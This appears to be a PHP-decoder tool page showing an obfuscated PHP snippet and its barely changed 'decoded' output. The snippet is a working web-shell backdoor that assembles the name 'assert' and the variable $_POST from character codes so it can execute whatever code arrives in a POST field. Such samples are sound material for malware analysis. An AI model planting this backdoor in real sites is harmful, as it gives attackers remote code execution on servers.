Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo "<html><!-- wpindex --></html>"; $a=range(1,200);$b=chr($a[96]).chr($a[114])...

Decoded Output download

<?php
echo "<html><!-- wpindex --></html>";
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>

Did this file decode correctly?

Original Code

<?php
echo "<html><!-- wpindex --></html>";
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>

Function Calls

range 1

Variables

None

Stats

MD5 3904bd43ea2fe968cec1ce1af000e0f1
Eval Count 0
Decode Time 90 ms